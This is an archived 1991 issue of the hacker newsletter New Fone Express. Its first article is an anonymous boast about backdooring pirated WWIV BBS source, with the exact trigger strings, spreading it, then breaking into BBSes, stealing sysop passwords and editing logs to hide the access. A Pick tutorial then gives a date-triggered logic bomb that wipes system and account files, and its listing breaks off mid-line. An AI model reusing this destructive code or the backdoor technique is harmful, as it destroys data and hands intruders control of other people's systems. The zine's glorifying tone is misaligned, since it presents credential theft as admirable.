home *** CD-ROM | disk | FTP | other *** search
/ Hacker Chronicles 2 (Alt) / The_Hacker_Chronicles_Volume_II-CD2.iso / miscpub1 / nfx_6 < prev    next >
Encoding:
Text File  |  1995-01-03  |  22.8 KB  |  3 lines
  1.                 =======================================
  2.                 T H E   N E W   F O N E   E X P R E S S
  3.                 =======================================
  4.  
  5.    The newsletter of the Society for the Freedom of Information (SFI)
  6.  
  7.                            Electronic Edition
  8.             Central distribution site is Secret Society BBS
  9.                   (314) 831-9039, WWIVNet 3460, 24hrs
  10.  
  11. ------------------------------------------------------------------------------
  12. The publisher, SFI, distribution site(s), and authors contributing to the NFX
  13. are protected by the Bill of Rights in the U.S. Constitution, which
  14. specifically protects freedom of speech and freedom of the press.  The
  15. information provided in this magazine is for informational purposes only, and
  16. the publisher, SFI, distribution site(s) and authors are not responsible for
  17. any problems resulting from the use of this information.  Nor is SFI
  18. responsible for consequences resulting from authors' actions.  This
  19. disclaimer is retroactive to all previous issues of the NFX.
  20.  
  21. We accept article submissions of nearly any sort, about
  22. hack/phreak/anarchy/gov't/nets/etc.  Send mail to the publisher (The
  23. Cavalier) at any of these addresses:
  24.  
  25. WWIVnet           [15@3460]  
  26. WWIVlink          [442@13468]
  27. VMB               (301) 771-1151. hit #, then 140.
  28. Ripco             [send mail to Silicon Avalanche]
  29. Daydream Nation   [send mail to Silicon Avalanche]
  30. Internet          [1098i9@gmuvax2.gmu.edu or 2275a6@gmuvax.gmu.edu]
  31.  
  32. The printed edition of the newsletter is available for $14 (U.S.) per year on
  33. paper or $2 (U.S.) for a single copy.  Send mail to the New Fone Express,
  34. Jackson House Rm 206, President's Park, 10309 Senatorial Lane, Fairfax, VA
  35. 22030.  Don't forget your name and address.
  36.  
  37. To download the New Fone Express, call Secret Society at (314) 831-9039 and
  38. log on as NFX, password NFX, phone# 0000, or see the distribution list
  39. elsewhere in this magazine. 
  40.  
  41. ------------------------------------------------------------------------------
  42.  
  43. Highlights for Issue #6/November 1991
  44. =====================================
  45.  
  46. * "Hacking WWIV v4.12" ... by (anonymous)
  47.   (see article #1)
  48.  
  49. * A Pick Tutorial Pt. 3 ... by Silicon Avalanche
  50.   (see article #2)
  51.  
  52. * Six Simple Things to Do.. ... by Polekat
  53.   (see article #3)
  54.  
  55. * Distribution Site List ... edited
  56.   (see article #4)
  57.  
  58. * Trendwatcher ... edited
  59.   (see article #5)
  60.  
  61. * Editorial ... by the Cavalier
  62.   (see article #6)
  63.  
  64. ------------------------------------------------------------------------------
  65. ------------------------------------------------------------------------------
  66.  
  67. "Hacking WWIV v4.12"
  68.  
  69.     The following is an account of a few special events that occurred in the
  70. 314 area code concerning the hacking of WWIV v4.12 bbs's. All of the events
  71. described in this article happened between 12/03/90 and 10/04/91.
  72.  
  73.     With the onset of a new version of WWIV coming out, my hunger for C
  74. programming experience, and my amount of C programming language ever
  75. expanding, I dreamed about what I might add to the new source code. Coming up
  76. with some good ideas, (yes, actually useful WWIV mods) one very malicious
  77. thought crossed my mind. Something a friend of mine had gotten me thinking
  78. about earlier that day. Insert a back door into the WWIV source code, and
  79. distribute the bogus source. Ahh yes! The ultimate power! Total control of
  80. someone else's computer, that didn't know you in the slightest way! Earlier
  81. that month, Wayne Bell had just made available, to all registered System
  82. Operators of WWIV BBS software, the WWIV v4.12 source code. Since I was still
  83. running v4.07 at the time, I decided this was a good time to upgrade. WWIV
  84. v4.12, seemed to have a lot of great new features that would have required
  85. massive modification to a v4.07 source code. Upon getting my paws on a copy
  86. of the v4.12 source code, I sat down for about two and a half hours and modded
  87. away. After I finished inserting a batch upload mod, 3 things forced me to
  88. stop modding for the time being.
  89.  
  90. 1) Fellow users would kill me if I called them at 2:30 AM to test a mod.
  91. 2) I wasn't sure if any of my users knew how to use Zmodem batch upload.
  92. 3) I was really hungry for about six White Castle hamburgers.
  93.  
  94.     The part about the hamburgers, being the most dominant thought in my
  95. mind, pushed me to jump in the car, head down to Dorsett Rd., and grab some
  96. burgers.
  97.  
  98.     While sitting in the car, eating my hamburgers, I deliberated over how I
  99. might be able to use WWIV to gain control of other unsuspecting sysops'
  100. computers.  At that moment, there in the parking lot of White Castle, at
  101. exactly 2:51 AM on 12/03/90, the ultimate hack plan hit me. I like many other
  102. unregistered WWIV sysops had obtained the WWIV v4.12 source code, illegally.
  103. Yes, a user had uploaded it to my computer. I had been considering
  104. registration, since I wanted to get my BBS on WWIVnet, and this was a
  105. requirement if your WWIV BBS was modded in the SLIGHTEST way.  But I thought,
  106. if it was so easy for me to get a copy of the source, just think of how many
  107. other unregistered sysops are running pirate sources that they modded too!
  108. The only thing that stood in my way of modifying and distributing a pirate
  109. source code was PKZIP v1.10 authentic verification. When you unzip an
  110. original unmodified v4.12 source, a -AV will appear next to every file, and
  111. at the end, the message: 'Authenticity Verifies! Wayne Bell (UJK765).' Well,
  112. if I modified any of the source files, and put them back in the zip, the
  113. message would be more along the lines of: 'Authenticity Verification Failed!
  114. Contact the author' or some BS like that. Deciding that I wouldn't worry
  115. about this problem for now, I began to write my back door into the v4.12
  116. source. Any dummy with an ounce of knowledge of C could have done it, I was
  117. surprised that I hadn't ever heard of it being done before.  Nonetheless, I
  118. started out where all the //<COMMAND> sysop utility commands are written in
  119. to the main source file.
  120.  
  121.     The idea that hit me was to create a secret WWIV dos shell command that
  122. didn't ask for a system pw. The command, like most 'special' commands in
  123. WWIV would begin with a // preceding it, and would work when entered at
  124. the main menu. It would have to be a code, that didn't even remotely look
  125. like anything to a normal user. The code would need to look like an intricate
  126. line of C programming.  These two characteristics were required because,
  127. first, and most important, I didn't want the code to be anything 'guessable.'
  128. Secondly, it had to be 'hidden' from someone who might be paging through the
  129. programming code. Strolling through the WWIV C code, I found a nice,
  130. unguessable, line that would perfectly suit my needs. The line read as
  131. follows:
  132.  
  133. //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD
  134.  
  135.     Upon deciding that this would be my secret shell to dos code, I scrolled
  136. up to the //DOS function, to find out what made it work, and what asked for
  137. the system password (SY:) before the shell occurred.
  138.     After block copying the programming code that came after //DOS, (the dos
  139. shell activation programming code) and strategically placing it after my
  140. //0_RDWR | 0_BINARY | 0_CREAT, S_IREAD code so it would be activated when
  141. the // code was entered, I was ready to compile it and test it out on my own
  142. system. After a few error corrections, time wasting errors like leaving off
  143. a '{' or something stupid like that, I achieved a BBS.EXE that to everyone,
  144. except myself would look perfectly ok to run a WWIV BBS on. I replaced my
  145. normal BBS.EXE with this new one, and activated BBS.COM(to load everything
  146. up). After using space+f to fast log on to my account, at the main prompt, I
  147. entered the // code. I was immediately elated with happiness to see that I
  148. had been abruptly thrown into a DOS shell.  I didn't even get asked for a
  149. system password. It was great! Since I was in such a good mood, I decided to
  150. add one more // code into the BBS. This next code would activate the user
  151. editor. Once I had begun using my back door, on other BBS's, I realized that
  152. the User Editor back door wasn't worth crap, since you have to have a 255 SL
  153. to be able to read passwords, and you can't give out anymore access than you
  154. have. But, at the time that I programmed in the User Editor back door, I
  155. wasn't thinking about this.
  156.     The next line details the code that activated the user editor. Again, it
  157. was a far strung out code that no one would guess, looked like a line of C,
  158. and was entered from the main menu prompt.
  159.  
  160. //SPRINTF(S1,%SUSER.IEND++261
  161.        
  162.     Upon entry of this code, there is an instruction in the source to
  163. activate a function called data(). Data() was a copy of void uedit() that I had
  164. renamed, void data(), and stuck into the VOTEEDIT.C file. After entering this
  165. code in, I was able to page through all of the user accounts, and see
  166. whatever info I wanted to see, except passwords! I didn't realize the check for
  167. a 255 SL upon password display until the source was distributed, so for the
  168. most part, the user editor back door was useless.
  169.     Even if the uedit backdoor didn't do anything except display personal
  170. info, I still had the most powerful weapon programmed into the code, the DOS
  171. back door.
  172.     When I was finished with the bogus source, and felt that it was ready to
  173. be distributed, I zipped it down, and placed it on my BBS for download. About
  174. four months went by, and I forgot about the whole thing. As a sysop, I didn't
  175. call out a whole lot, so I didn't know what BBS's might have the source,
  176. furthermore, since I had forgotten about it, I didn't care. One day, my
  177. friend who originally came up with the wonderful idea, called me with a
  178. supreme amount of excitement in his voice. When I had programmed in the back
  179. doors, I had given him a copy of the codes, and what they would do. At that
  180. time, he seemed rather passive about it, and so was I. For some reason, both of
  181. us didn't think anything would ever come of it. Anyway, he had called to tell
  182. me that he had logged on to a modified, unregistered WWIV v4.12 BBS, and he had
  183. typed in the back door code for the user editor, and much to his amazement,
  184. it worked!
  185.     I'm sure many of you reading this, were familiar, or at least heard of
  186. something called NGNet. It stands for Neat Guys Net (if that tells you
  187. anything).  Well, NGNet only expanded out to about six or seven BBS's, at the
  188. height of its popularity, but one odd thing about all these BBS's, is that
  189. they all looked EXACTLY alike, and I mean EXACTLY.  All of them had the SAME
  190. modified pirated WWIV v4.12 source code. It was a hacker's dream come true.
  191. To have total control of a whole slew of BBS's, on their own network. It
  192. turns out, that the originator of NGNet, whose name I do not know, somehow got
  193. a copy of the source code that I had modified. He then, not knowing that there
  194. was a back door in the source, modified it to his liking.  After this, he gave
  195. a copy of the modified BBS.EXE to the other BBS's that were in NGNet. Almost
  196. all of the BBS's in NGNet, being run by bullshit sysops that didn't know crap
  197. about source modification, immediately switched to this new BBS.EXE with the
  198. mods that the originator of NGNet had installed, and which back door mod was
  199. in too.
  200.     The first BBS that I used the DOS door on, was The Mysterious Land of
  201. A&F. It worked flawlessly, and with my extra knowledge of WWIV password
  202. storage, I knew right where all the info I needed was. Since I was in DOS, I
  203. made my way to the \WWIV directory. By typing the CONFIG.DAT file, I was
  204. granted, along with a lot of garbage characters, the system password. After
  205. activating my printscreen key to send that password to the printer, I wasted no
  206. time in making my way into the \WWIV\DATA directory. Here I typed the USER.LST
  207. file.  Among all the garbage that filled my screen, a few key numbers and one
  208. word caught my attention. The numbers were the last four digits of the sysop's
  209. phone number, and the key word was the sysop's password! Now, armed with the
  210. system password, the sysop's personal password, and the last four digits of
  211. the sysop's phone number, nothing could stop me from taking complete control
  212. of the BBS! After issuing exit, and a carriage return, I was soon back in
  213. WWIV. I quickly logged off, and began to dial that very very Mysterious Land
  214. of A&F again. This time, instead of logging on as a normal account, I put in
  215. all the sysop's info, and soon I was on the BBS via the sysop's account. I
  216. was curious as to what Mysterious secrets the Land of A&F held, so I began to
  217. look around.  A quick trip into the transfer area revealed some shocking news
  218. about the sysop, and the type of BBS he ran. Dropping back to the main menu,
  219. I requested a list of the message bases via the '*' command. The first message
  220. base that caught my eye, and for the moment, piqued my interest, was the
  221. NGNet Sysops' Discussion Net. Scanning through the messages, I noticed, what I
  222. had assumed about the NGNet BBS's. Most of the sysops were, or acted like they
  223. were no older than 15 years old. So many of the messages on this sub were so
  224. worthless, things like "Hey guys....how do you like my new macro" and "Do any
  225. of you other NGN bbs's out there have any new porno GIFS you could upload to
  226. my board?" This kind of crap is the pointless childish bullshit that I try to
  227. avoid when I call out, let alone when I go seriously hacking. Anyway, after
  228. reading these discouraging messages, I became extremely uninterested in the
  229. message bases. I then, shelled down to dos, this time using the legit //DOS
  230. command, and the system password. After looking around for a while, and
  231. finding some more incriminating evidence about the sysop, I got kind of
  232. bored.
  233. Since I felt that it would be nice to keep this BBS under my thumb, I needed
  234. to edit the daily sysop log files, so the sysop wouldn't realize someone had
  235. been there, under his account.  After some copying, downloading, uploading,
  236. and overwriting of files, the edited sysop log files were in place, and I
  237. felt at ease about the whole thing. My terminal program displayed that I had
  238. been on the BBS for 38 minutes. I was tiring fast, as in order for the sysop
  239. not to see me, I had to do this at 3:15 AM, so I logged off and went to bed.
  240. As time went on, my friend and I noticed, and hacked into all the BBS's that
  241. were on the NGNet. We even did a few that weren't on the net, and had just
  242. picked up a copy of the bogus source floating around. All in all, it was an
  243. incredible feat to be accomplished, but, with the help of some extremely
  244. stupid sysops who failed to look for Authentic Verification when they
  245. unzipped their pirate source codes, it was very possible. I suppose there is
  246. some kind of morale to this story, that being that you should probably register
  247. WWIV if you want to mod the source, but I won't go too far into that.
  248.  
  249. A Few Side Notes
  250.     Of all the time I spent hacking at the NGNet bbs's, I think I spent the
  251. most time on Land of A&F. That bbs, and Quality Connection, interested me
  252. most.  Of course, with all this hacking, it had to happen. I screwed up a few
  253. times.  Never did I mess up so bad, that the sysop totally found out about
  254. what was going on, but I did make a few mistakes. One time, when I was on
  255. Land of A&F, I forgot to edit the sysop's name (I had logged on under his
  256. account) out of the 'last few callers' file. Amazingly, Awesome A, the sysop
  257. of A&F, didn't catch it. Another time, I had copied all of Mr. Quality's
  258. (sysop of Quality Connection) bbs passwords off his hdd via the back door in
  259. Quality Connection.  Mr. Quality had sysop access at Land of A&F, so of course,
  260. I had to check things out from his account, even though I knew it all would be
  261. the same. I was getting kind of lazy, and one time I didn't really feel like
  262. doing all of the log file editing, so I just logged off. A few days later, I
  263. intercepted a message on the NGNet Sysop Discussion Sub (while on under the
  264. sysop's account) that Awesome A had posted.  It alerted all the NGN bbs's of
  265. a hacker that logged on to Land of A&F under Mr. Quality's account.  Of course,
  266. none of those dumbshit NGNet sysops even thought there might be something
  267. wrong with their source code, or EXE file. With Mr. Quality's other
  268. passwords, I gained total control over a few bbs's that didn't even have the
  269. back door in them, but where Mr. Quality had sysop access on. I did this with
  270. Awesome A's passwords too, and at one time had total control of Too $hort's
  271. bbs, the Ghetto. Too $hort wasn't running the pirate source code, but for
  272. some reason he had given Awesome A sysop access.  From here, I copied out all of
  273. Too $hort's passwords, and used his accounts around town. It was nice to have
  274. full run over so many bbs's. Too $hort had pretty good access (90 SL) at
  275. Master Control Program, which allowed me to batch d/l from there quite often,
  276. but I never was able to get an account, on MCP, that had anything better than
  277. a 90.  I never did really get to know Too $hort beyond a dialout to his bbs,
  278. but I'll tell you one thing, I really hate the way he signs his name, Too
  279. $hort, the dollarsign, in my opinion, is really squidly.  Another good bbs,
  280. that I called quite a bit, usually under false accounts, was Secret Society.
  281. Grim stocks an excellent selection of informational text files, but he needs
  282. to upgrade to at least 2400 sometime in the near future, if he expects to
  283. keep that excellent group of users calling.
  284.     I know that many of you who read this will doubt any of what I have said
  285. ever happened, and you'd be an idiot not to unless some evidence was
  286. presented.  Yes, that's correct, the evidence IS out there. I can guarantee
  287. anyone that the modified WWIV v4.12 source is out there, somewhere still on-
  288. line ready to be downloaded off of some weak, non current pirate bbs. If you
  289. happen to see a copy of the WWIV v4.12 source, on a bbs, do an archive
  290. listing, and, if possible, an integrity check.  If it doesn't have any pkzip
  291. verification on it, then extract out the BBS.C and VOTEEDIT.C files and
  292. download them.  Load BBS.C into an editor, and do a 'string search.' Search
  293. for either one of the above // codes.  Both, the dos door, and the uedit door
  294. should be in there.  Also, in VOTEEDIT.C, as I mentioned before, there is a
  295. function in there called data().  In it is the exact same thing that was in
  296. the function uedit(). Also, another way of proof, is that you could possibly
  297. find and call an unregistered, modified WWIV v4.12 bbs and attempt to use
  298. those codes. But since v4.20 is out, I doubt many of the idiotic squid sysops
  299. that grasped on to the unverified v4.12 source will still be with v4.12, they
  300. will probably have upgraded to v4.20 now, being that their bbs's are so damn
  301. unstable.
  302.     I never did register my copy of WWIV, as my bbs went down a short time
  303. ago, and I never was able to get on WWIVnet. It was on-line for over four
  304. years, very private, but lately, I've realized the lousy condition of the
  305. hack/phreak/anarchy community, and I've just kind of lost interest in
  306. bbs'ing.
  307. I'm writing this, partly, to try and 'do my part' for the hack/phreak/anarchy
  308. community, and show the others out there that yes, there are still a few
  309. conniving, ingenious, ruthless hackers out there. I'd like to see the other
  310. true hackers out there get off their asses and do something! If you're not
  311. going to hack anymore, at least write an article about your experiences, and
  312. send it to the editor of Phrack, NFX, Digital Underground (If DU is till in
  313. publication) or any electronic publication.  Don't go around destroying
  314. systems (rm *), just hack them, and brag about it, just like the old days.
  315. Note that I never once deleted a file on any of the computers that I hacked,
  316. that I wasn't absolutely sure I would replace.
  317.  
  318.                            -Disclaimer of Who I Am-
  319.     I don't really bbs too much any more, as I haven't been interested in it
  320. for quite sometime now.  Still, just to avoid any accusations, phone
  321. harassment, or any bullshit from those NGNet sysops, whom I'm sure will be
  322. extremely pissed once they hear of this, I'll be placing strict anonymity
  323. on this article. Don't come after the editor of New Fone Express, as even he
  324. won't know who I am. I'm not even sure that he'll put this in his
  325. publication.
  326. And above all, please don't be an ass and throw accusations around at other
  327. bbs'ers. I'm only slightly active on one bbs now, and if I don't call there
  328. within four days from now, I'll be deleted due to inactivity. As I mentioned
  329. before, I don't have an account on MCP any more, again, due to inactivity. I
  330. had a stable account on Secret Society, but for quite sometime, I've been
  331. deleted, yes again, due to inactivity.  I tried to keep a stable account on
  332. Angel Station, but it seemed that bbs was always crashing, and everyone
  333. would have to logon as new users.  I'm pretty sure I've been deleted on
  334. Blitzkrieg, but I have to say that that was one of the best, most stable
  335. bbs's I was ever on.  So, if you are ready to go on some hellish trek to even
  336. attempt to find me, give up now!  Don't waste your time, as I'm sure your
  337. attempt(s) will be in vain.                                             ><
  338.  
  339. [TC: The best chance you have of reaching the author is to send mail to me,
  340. and I will forward it to the false account that has been set up.  Also, the
  341. author included around 30k of screen capture files from the hack itself,
  342. which I have omitted in the interests of space.]
  343.  
  344. ------------------------------------------------------------------------------
  345. ------------------------------------------------------------------------------
  346.  
  347. Pick Tutorial
  348.             A Pick Tutorial - Courtesy of Silicon Avalanche of SFI
  349.                                 Installment #3
  350.  
  351. COUGH.. HACK... WHEEZE...
  352.    
  353.       Hello everybody, and welcome to the latest edition of the Pick
  354. Tutorial.  This volume is a quickie (because I'm about a week past the
  355. submission deadline, and the publisher is starting to hound me), about a
  356. simple, generic Pick virus.  Let's get started, 'eh?
  357.  
  358. >ED SYSPROG-PL USER-COLDSTART      
  359.  
  360. TOP
  361. .  
  362.  
  363. 001 PQ
  364. . I  
  365.  
  366. 001+HVIR  
  367. 001+P
  368. 001+   
  369. . FI  
  370.  
  371. >ED BP VIR  
  372.  
  373. NEW ITEM
  374. TOP
  375. . I  
  376.  
  377. 001+*  
  378. 002+*  
  379. 003+*  
  380. 004+*  
  381. 005+*  
  382. 006+BREAK OFF  
  383. 007+WAKEUPDATE="MM/DD/YY"      
  384. 008+* In the above, replace the MM/DD/YY with a month, day and year.
  385. 009+WAKEDATEIC=ICONV(WAKEUPDATE,"DI")
  386. 010+*
  387. 011+IF DATE()#WAKEDATEIC THEN STOP
  388. 012+* Tell everybody we're here...
  389. 013+EXECUTE "BLOCK-PRINT TIME'S UP!!!! HEH HEH HEH HEH HEH HEH HEH HEH
  390. HEH..."
  391. 014+* Wipe out the SYSTEM file - lose all the accounts...
  392. 015+EXECUTE "CLEAR-FILE DICT SYSTEM" CAPTURING JUNK RETURNING MOREJUNK
  393. 016+EXECUTE "CLEAR-FILE DATA SYSTEM" CAPTURING JUNK RETURNING MOREJUNK
  394. 017+* Wipe out the MASTER DICTIONARY (MD)
  395. 018+EXECUTE "CLEAR-FILE DICT MD" CAPTURING JUNK RETURNING MOREJUNK
  396. 019+EXECUTE "CLEAR-FILE DATA MD" CAPTURING JUNK RETURNING MOREJUNK
  397. 020+* Wipe out the ERRMSG file
  398. 021+EXECUTE "CLEAR-FILE DICT ERRMSG" CAPTURING JUNK RETURNING MOREJUNK
  399. 022+EXECUTE "CLEAR-FILE DATA ERRMSG" CAPTURING JUNK RETURNING MOREJUNK
  400. 023+* Create a new LOGON banner to tell everyone hello...
  401. 024+REC=''
  402. 025+REC<1>="L(12)"
  403. 026+REC<2>="S(25)"
  404. 027+REC<3>="HYour System's been SHUT DOWN!!"
  405. 028+* Add as many lines saying whatever you want, but the last line MUST be:
  406. 029+REC<4>=+
  407. 030+* in this case, 4 is the last line, this would be a 50 if REC<1> through
  408. 031+* REC<49> were defin
  409.  
  410.  
  411. Downloaded From P-80 International Information Systems 304-744-2253
  412.